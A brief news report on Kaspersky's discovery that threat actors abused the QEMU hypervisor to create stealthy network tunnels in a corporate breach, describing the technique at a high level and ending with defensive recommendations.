Hackers have been detected exploiting the open-source hypervisor platform QEMU to create covert network tunnels in a cyberattack against a large company. QEMU, known for its capability to run operating systems as guests on a computer, was manipulated by threat actors to establish virtual network interfaces and connect to a remote server, allowing them to create a network tunnel with minimal impact on system performance. Kaspersky analysts uncovered this attack while investigating suspicious activity within the breached company's systems.
Network tunnels serve as stealthy communication channels between hackers and compromised systems, often encrypting traffic to evade security measures. While attackers commonly use utilities like FRP and ngrok for tunnelling, the use of QEMU is less conventional, offering unique capabilities such as hardware emulation and virtual network support. In this attack, QEMU's versatility allowed malicious activities to blend in with benign virtualization traffic and bridge segmented network parts through strategically set up VM pivot points.
The attackers maintained a lightweight footprint by allocating minimal resources to the virtual machine, reducing the risk of detection through resource consumption. They utilized tools like Angry IP Scanner and mimikatz for network scanning and credential theft, respectively, alongside QEMU for creating sophisticated network tunnelling setups.
Kaspersky emphasizes the importance of multi-level protection to detect the use of legitimate tools like QEMU, suggesting 24/7 network monitoring and endpoint protection as essential measures. Comprehensive security, including network and endpoint monitoring by Security Operations Center (SOC) experts, is crucial for detecting and mitigating complex and targeted attacks effectively. This case underscores the need for proactive cybersecurity measures to defend against evolving threats in today's digital landscape.